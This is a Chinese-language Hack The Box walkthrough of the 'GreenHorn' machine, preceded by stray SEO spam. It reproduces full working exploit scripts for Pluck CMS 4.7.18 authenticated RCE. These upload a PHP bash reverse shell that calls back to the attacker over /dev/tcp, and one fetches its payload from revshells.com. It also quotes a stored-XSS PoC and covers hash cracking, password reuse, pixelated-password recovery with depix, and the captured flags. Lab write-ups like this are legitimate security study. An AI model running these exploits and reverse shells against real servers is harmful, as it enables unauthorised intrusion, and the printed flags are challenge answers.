手机移动端网站建设宣传,长春网站开发,哪些网站做平面设计素材,17网站一起做网店普宁轻纺城目录
连接至HTB服务器并启动靶机
使用nmap对靶机TCP端口进行开放扫描
再次使用nmap对这三个端口进行脚本、服务扫描
尝试先通过curl访问靶机80端口
将靶机IP与该域名写入hosts使DNS本地解析
使用浏览器访问greenhorn.htb
使用Wappalyzer插件查看该页面技术栈
尝试在sea…目录
连接至HTB服务器并启动靶机
使用nmap对靶机TCP端口进行开放扫描
再次使用nmap对这三个端口进行脚本、服务扫描
尝试先通过curl访问靶机80端口
将靶机IP与该域名写入hosts使DNS本地解析
使用浏览器访问greenhorn.htb
使用Wappalyzer插件查看该页面技术栈
尝试在searchsploit搜索该CMS漏洞
这里使用curl访问login_url、upload_url都是响应404
使用ffuf尝试寻找该域名的子域
使用浏览器直接访问/admin.php
再次通过searchsploit搜索该CMS漏洞
回到一开头的RCE漏洞
尝试使用浏览器访问靶机3000端口页面
判断该哈希值类型
回到登录界面这次成功登录了
横向移动
USER_FLAGfb721ba08d0f33ea2db2435988373890
权限提升
靶机通过python3开启一个http服务
尝试复原马赛克原文
ROOT_FLAGc279c1f9e7a93817a0d31cfa95205a62 连接至HTB服务器并启动靶机 靶机IP10.10.11.25 分配IP10.10.14.12 使用nmap对靶机TCP端口进行开放扫描
nmap -p- --min-rate1500 -T5 -sS -Pn 10.10.11.25 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# nmap -p- --min-rate1500 -T5 -sS -Pn 10.10.11.25 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 06:59 EST Warning: 10.10.11.25 giving up on port because retransmission cap hit (2). Nmap scan report for 10.10.11.25 (10.10.11.25) Host is up (0.066s latency). Not shown: 65433 closed tcp ports (reset), 99 filtered tcp ports (no-response) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3000/tcp open ppp Nmap done: 1 IP address (1 host up) scanned in 46.13 seconds 可见开放端口22、80、3000
再次使用nmap对这三个端口进行脚本、服务扫描
nmap -p 22,80,3000 -sCV 10.10.11.25 尝试先通过curl访问靶机80端口
curl -I http://10.10.11.25 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# curl -I http://10.10.11.25 HTTP/1.1 302 Moved Temporarily Server: nginx/1.18.0 (Ubuntu) Date: Fri, 08 Nov 2024 11:51:57 GMT Content-Type: text/html Content-Length: 154 Connection: keep-alive Location: http://greenhorn.htb/ 发现被重定位到greenhorn.htb
将靶机IP与该域名写入hosts使DNS本地解析
echo 10.10.11.25 greenhorn.htb /etc/hosts 使用浏览器访问greenhorn.htb 点击下方的admin会跳转到/login.php 通过该页面信息可以判断该CMS版本为4.7.18
使用Wappalyzer插件查看该页面技术栈 尝试在searchsploit搜索该CMS漏洞
searchsploit pluck 在searchsploit可以看到4.7.18是存在一个RCE漏洞的直接把相关EXP拷贝到当前目录下
searchsploit -m 51592.py ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# searchsploit -m 51592.py Exploit: Pluck v4.7.18 - Remote Code Execution (RCE) URL: https://www.exploit-db.com/exploits/51592 Path: /usr/share/exploitdb/exploits/php/webapps/51592.py Codes: N/A Verified: False File Type: Python script, Unicode text, UTF-8 text executable Copied to: /home/kali/Desktop/temp/51592.py 查看该EXP代码
cat 51592.py
#Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)
#Application: pluck
#Version: 4.7.18
#Bugs: RCE
#Technology: PHP
#Vendor URL: https://github.com/pluck-cms/pluck
#Software Link: https://github.com/pluck-cms/pluck
#Date of found: 10-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linuximport requests
from requests_toolbelt.multipart.encoder import MultipartEncoderlogin_url http://localhost/pluck/login.php
upload_url http://localhost/pluck/admin.php?actioninstallmodule
headers {Referer: login_url,}
login_payload {cont1: admin,bogus: ,submit: Log in}file_path input(ZIP file path: )multipart_data MultipartEncoder(fields{sendfile: (mirabbas.zip, open(file_path, rb), application/zip),submit: Upload}
)session requests.Session()
login_response session.post(login_url, headersheaders, datalogin_payload)if login_response.status_code 200:print(Login account)upload_headers {Referer: upload_url,Content-Type: multipart_data.content_type}upload_response session.post(upload_url, headersupload_headers, datamultipart_data)if upload_response.status_code 200:print(ZIP file download.)else:print(ZIP file download error. Response code:, upload_response.status_code)
else:print(Login problem. response code:, login_response.status_code)rce_urlhttp://localhost/pluck/data/modules/mirabbas/miri.phprcerequests.get(rce_url)print(rce.text)
这里使用curl访问login_url、upload_url都是响应404
curl -I http://greenhorn.htb/pluck/login.php
curl -I http://greenhorn.htb/pluck/admin.php?actioninstallmodule ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# curl -I http://greenhorn.htb/pluck/login.php HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Fri, 08 Nov 2024 12:01:40 GMT Content-Type: text/html; charsetUTF-8 Connection: keep-alive ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# curl -I http://greenhorn.htb/pluck/admin.php?actioninstallmodule HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Fri, 08 Nov 2024 12:01:57 GMT Content-Type: text/html; charsetUTF-8 Connection: keep-alive 这并不意味着这个EXP是不可用的因为靶机的admin.php和login.php均不在pluck路径下 使用ffuf尝试寻找该域名的子域
ffuf -u http://greenhorn.htb/ -H Host: FUZZ.greenhorn.htb -w ../dictionary/subdomains-top5000.txt -fc 302 眼见扫不出子域只能尝试路径FUZZ了
ffuf -u http://greenhorn.htb/FUZZ -w ../dictionary/common.txt -fc 302 这里扫出了一个admin.php而一开头点击admin会跳转至login.php
而searchsploit搜索该CMS相关漏洞时除了一个RCE还有一个存储型XSS...
使用浏览器直接访问/admin.php
可以看到是成功访问了的但因为session或者cookie的原因没有通过访问 考虑是通过存储型XSS获取管理员Cookie然后登录后台面板 再次通过searchsploit搜索该CMS漏洞
searchsploit pluck 取出该存储型XSS相关PoC
searchsploit -m 51420.txt
查看该PoC内容
cat 51420.txt
Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)
Application: pluck
Version: 4.7.18
Bugs: XSS
Technology: PHP
Vendor URL: https://github.com/pluck-cms/pluck
Software Link: https://github.com/pluck-cms/pluck
Date of found: 01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux2. Technical Details POCsteps:1. create .svg file.
2. svg file content:
?xml version1.0 standaloneno?
!DOCTYPE svg PUBLIC -//W3C//DTD SVG 1.1//EN http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtdsvg version1.1 baseProfilefull xmlnshttp://www.w3.org/2000/svgpolygon idtriangle points0,0 0,50 50,0 fill#009900 stroke#004400/script typetext/javascriptalert(document.location);/script
/svg3. upload file (http://localhost/pluck-4.7.18/admin.php?actionfiles)poc requestPOST /pluck-4.7.18/admin.php?actionfiles HTTP/1.1
Host: localhost
Content-Length: 672
Cache-Control: max-age0
sec-ch-ua: Not?A_Brand;v8, Chromium;v108
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: Linux
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary----WebKitFormBoundaryJMTiFxESCx7aNqmI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/pluck-4.7.18/admin.php?actionfiles
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q0.9
Cookie: PHPSESSIDs34g5lr0qg5m4qh0ph5plmo8de
Connection: close------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; namefilefile; filenameSVG_XSS.svg
Content-Type: image/svgxml?xml version1.0 standaloneno?
!DOCTYPE svg PUBLIC -//W3C//DTD SVG 1.1//EN http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtdsvg version1.1 baseProfilefull xmlnshttp://www.w3.org/2000/svgpolygon idtriangle points0,0 0,50 50,0 fill#009900 stroke#004400/script typetext/javascriptalert(document.location);/script
/svg
------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; namesubmitUpload
------WebKitFormBoundaryJMTiFxESCx7aNqmI--4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg
发现这玩意是需要进入admin.php下才能进行POST操作的... 回到一开头的RCE漏洞
我重新到Github找到了其他的EXP #!/bin/bash# Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)
# Application: pluck
# Version: 4.7.18
# Bugs: RCE
# Technology: PHP
# Vendor URL: https://github.com/pluck-cms/pluck
# Date of found: 10-07-2023
# Author: Mirabbas Ağalarov
# Tested on: Linux# Start the timer
start_time$(date %s)# Default variables for host, IP, Port, and Password
host
ip
port
password
cookie# Function to display usage help
usage() {echo Usage: $0 -h Host -p Password -i IP -P Portecho -h Set the host URL (e.g., xyz.htb)echo -P Set the password for the platformecho -i Set the IP address for the reverse shellecho -p Set the Port number for the reverse shellexit 1
}# Parse command-line arguments
while getopts h:p:i:P: opt; docase $opt inh) host$OPTARG ;;P) password$OPTARG ;;i) ip$OPTARG ;;p) port$OPTARG ;;*) usage ;;esac
done# Check if required arguments are provided
if [ -z $host ] || [ -z $ip ] || [ -z $port ] || [ -z $password ]; thenecho Error: Host, IP, Port, and Password are required.usage
fi# Loop until Netcat is running on the specified port
while true; donc_check$(netstat -an | grep :$port | grep LISTEN)if [ -z $nc_check ]; thenecho Start a listener using nc -nvlp $port before uploading the exploit.sleep 5 # Wait for 5 seconds before checking againelseecho Netcat listener detected on port $port.breakfi
done# Set URLs for login, upload, and RCE paths
login_urlhttp://$host/login.php
upload_urlhttp://$host/admin.php?actioninstallmodule
rce_urlhttp://$host/data/modules/loverce/love.php# Function to extract and store the session cookie
extract_cookie() {cookie$(echo $1 | grep -oP (?Set-Cookie: )PHPSESSID[^;])echo Extracted Cookie: $cookie
}# Download the reverse shell PHP exploit
echo Downloading reverse shell PHP exploit...
exploit_urlhttps://www.revshells.com/PHP%20PentestMonkey?ip$ipport$portshellbashencodingbash
curl -sL $exploit_url -o reverse_shell.php# Check if the download was successful
if [ ! -f reverse_shell.php ]; thenecho Error downloading reverse shell exploit.exit 1
fi# Rename reverse_shell.php to love.php (to match the RCE path)
mv reverse_shell.php love.php# Zip the reverse shell and clean up the PHP file
zip_filenameloverce.zip
zip -r $zip_filename love.php
rm love.php
echo Exploit zipped as $zip_filename and original PHP file removed.# Set login payload with only password
login_payloadcont1$passwordbogussubmitLogin# Attempt login, follow redirects with -L, and extract the cookie
login_response$(curl -s -i -L -X POST -d $login_payload $login_url -H Content-Type: application/x-www-form-urlencoded -H User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36 -H Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,image/apng,*/*;q0.8,application/signed-exchange;vb3;q0.7 -H Referer: http://$host/login.php -H Origin: http://$host -H Connection: keep-alive)# Extract session cookie
extract_cookie $login_response# Check if login was successful
if echo $login_response | grep -q Password correct. Logging you in...; thenecho Login successful!# Upload the ZIP file using the extracted cookieupload_response$(curl -s -i -X POST -F sendfile$zip_filename;typeapplication/zip -F submitUpload $upload_url -H Cookie: $cookie)# Check if upload was successfulif echo $upload_response | grep -q HTTP/1.1 200 OK; thenecho ZIP file uploaded successfully.# Inform the user that RCE is triggeredecho RCE is waiting for you, please go take a look.# Add a short delay before triggering the RCEsleep 5# Execute the RCE request using the extracted cookie (suppress 504 error)rce_response$(curl -s -H Cookie: $cookie $rce_url || true)# Clean output (dont show 504 Gateway Time-out)if [[ ! $rce_response ~ 504 Gateway Time-out ]]; thenecho $rce_responsefi# Calculate the time taken to complete the scriptend_time$(date %s)duration$((end_time - start_time))echo Script terminated. Total time taken: $duration seconds.exit 0elseecho Error uploading ZIP file. Check response.exit 1fi
elseecho Login failed.# Print login response for debuggingecho $login_responseexit 1
fi
这个EXP看起来就好多了应该是针对HTB这个靶机写的(这算作弊么)
对该EXP进行代码审计可知这需要我们拿到该CMS的管理员密码才可进行利用 当我用弱口令TOP20000跑了半天我就知道这里必然不是弱口令T_T
打开浏览器一看天都塌了居然被封了五分钟 (此时我突然想起了一开头我们nmap扫描时一共扫出了三个端口)
尝试使用浏览器访问靶机3000端口页面 右上角居然还有一个注册按钮那我们就来注册一个test账户密码八个八 账户test 密码88888888 回到登录界面发现不对啊只能用admin用户登录T_T 回到靶机3000端口页面在探索栏目下可以看到网页源码 点击login.php看看会不会有敏感信息的泄露 发现源码中出现了一个pass.php尝试去看看它的内容 这哈希密码就直接写在这文件里了服了 d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163 判断该哈希值类型 SHA512在hashcat中的参数为1700 尝试通过弱口令字典爆破将哈希值写入文件中
echo d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163 hash
对该哈希值进行爆破
hashcat -m 1700 hash -a 0 ../dictionary/rockyou.txt --quiet ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# hashcat -m 1700 hash -a 0 ../dictionary/rockyou.txt --quiet d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163:iloveyou1 账户admin 密码iloveyou1 回到登录界面这次成功登录了
但似乎两个EXP都没有用上而且配置好正确密码后没一个能利用成功的 这次找到了一个直接可用的EXP
#!/usr/bin/python3
import os
import zipfile
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import argparsedef create_payload(ip_attack, port_attack):print([] Creating payload)return f?php echo system(\bash -c exec bash -i /dev/tcp/{ip_attack}/{port_attack} 1\)?def create_file(ip, port, file_name_php):payload_content create_payload(ip, port)print(f[] {Creating if not os.path.exists(file_name_php) else Overwriting} .php file)with open(file_name_php, w) as payload_file:payload_file.write(payload_content)return file_name_phpdef create_zip(file):zip_file_name malicious_file.zipprint([] Creating ZIP file)with zipfile.ZipFile(zip_file_name, w) as zipf:zipf.write(file)return zip_file_namedef upload_zip_malicious(file_name_zip, host, password,file_name_php):login_url f{host}/login.phpupload_url f{host}/admin.php?actioninstallmoduleheaders {Referer: login_url}login_payload {cont1: password, bogus: , submit: Log in}with requests.Session() as session:login_response session.post(login_url, headersheaders, datalogin_payload)if login_response.status_code 200:print(Login successful)with open(file_name_zip, rb) as f:multipart_data MultipartEncoder(fields{sendfile: (mirabbas.zip, f, application/zip),submit: Upload})upload_headers {Referer: upload_url,Content-Type: multipart_data.content_type}upload_response session.post(upload_url, headersupload_headers, datamultipart_data)if upload_response.status_code 200:print([] ZIP file uploaded successfully)else:print([] Error uploading ZIP file. Response code:, upload_response.status_code)else:print([] Login failed. Response code:, login_response.status_code)rce_url f{host}/data/modules/mirabbas/{file_name_php}rce_response session.get(rce_url)#print(rce_response.text)def main():parser argparse.ArgumentParser(descriptionScript to create and upload a malicious ZIP file.)parser.add_argument(--password, requiredTrue, helpPassword login)parser.add_argument(--filename, defaultmalicious.php, helpName of the PHP file to be created)parser.add_argument(--ip, requiredTrue, helpAttack IP )parser.add_argument(--port, requiredTrue, helpAttack Port)parser.add_argument(--host, requiredTrue, helpTarget host URL)args parser.parse_args()file create_file(args.ip, args.port, args.filename)zip_file create_zip(file)upload_zip_malicious(zip_file, args.host, args.password,args.filename)if __name__ __main__:main()直接通过该EXP进行漏洞利用
python exploit_pluckv4.7.18_RCE.py --password iloveyou1 --ip 10.10.14.12 --port 1425 --host http://greenhorn.htb
本地侧nc收到回显 ┌──(root㉿kali)-[/home/kali/Desktop/temp] └─# nc -lvnp 1425 listening on [any] 1425 ... connect to [10.10.14.12] from (UNKNOWN) [10.10.11.25] 39346 bash: cannot set terminal process group (1040): Inappropriate ioctl for device bash: no job control in this shell www-datagreenhorn:~/html/pluck/data/modules/mirabbas$ whoami whoami www-data 横向移动
查看该系统内用户
cat /etc/passwd 可以看到能登录的也就三个git、junior、root
尝试通过密码iloveyou1切换到这些用户 www-datagreenhorn:/home$ su root su root Password: iloveyou1 su: Authentication failure www-datagreenhorn:/home$ su git su git Password: iloveyou1 su: Authentication failure www-datagreenhorn:/home$ su junior su junior Password: iloveyou1 whoami junior 成功切换到了junior用户 账户junior 密码iloveyou1 提升TTY
script -c /bin/bash -q /dev/null
查找user_flag并查看其内容 juniorgreenhorn:/home$ find / -name user.txt 2/dev/null find / -name user.txt 2/dev/null /home/junior/user.txt juniorgreenhorn:/home$ cat /home/junior/user.txt cat /home/junior/user.txt fb721ba08d0f33ea2db2435988373890 USER_FLAGfb721ba08d0f33ea2db2435988373890 权限提升
查看该用户可特权执行的命令
sudo -l juniorgreenhorn:/home$ sudo -l sudo -l [sudo] password for junior: iloveyou1 Sorry, user junior may not run sudo on greenhorn. 查看该用户所属组别
groups juniorgreenhorn:/home$ groups groups junior 看来只能再看看有没有配置文件或者其他敏感文件泄露密码了 juniorgreenhorn:~$ pwd pwd /home/junior juniorgreenhorn:~$ ls ls user.txt Using OpenVAS.pdf 这里有个莫名其妙的pdf文件里面很可能有HTB留下的密码(毕竟是EASY难度的靶机)
靶机通过python3开启一个http服务
python3 -m http.server 6666
攻击机通过该http服务将Using OpenVAS.pdf文件进行下载
wget http://10.10.11.25:6666/Using OpenVAS.pdf -O Using OpenVAS.pdf
把这PDF文件拖到桌面打开后还真有密码只不过是被打码的而且还是图片 国产化后 你好朱尼尔 我们最近在服务器上安装了 OpenVAS开放式漏洞评估系统以便积极监测和识别潜在的安全漏洞。目前只有以我为代表的根用户有权使用以下命令执行 OpenVAS “sudo /usr/sbin/openvas” 输入密码 作为你熟悉这个工具的一部分我们鼓励你学习如何有效地使用 OpenVAS。将来当出现提示时你也可以通过输入相同的命令并提供你的密码来运行 OpenVAS。 如果你有任何问题或需要进一步的帮助请随时联系我们。 祝你度过愉快的一周 格林先生 根据该文件中的内容可知我们运行sudo /usr/sbin/openvas命令不需要ROOT密码
sudo /usr/sbin/openvas juniorgreenhorn:~$ sudo /usr/sbin/openvas sudo /usr/sbin/openvas [sudo] password for junior: iloveyou1 junior is not in the sudoers file. This incident will be reported. Emmmmmmm看来并不是通过该文件进行权限提升的
尝试复原马赛克原文
将马赛克图片从PDF文件中提取出来
pdfimages Using OpenVAS.pdf ./test
使用depix脚本进行复原
python .\depix.py -p .\test-000.ppm -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o out.png 依稀能分辨sidefromsidetheothersidesidefromsidetheotherside
使用该密码对靶机ROOT用户进行SSH服务登录 查找root_flag位置并查看其内容 rootgreenhorn:~# find / -name root.txt /root/root.txt rootgreenhorn:~# cat /root/root.txt c279c1f9e7a93817a0d31cfa95205a62 ROOT_FLAGc279c1f9e7a93817a0d31cfa95205a62
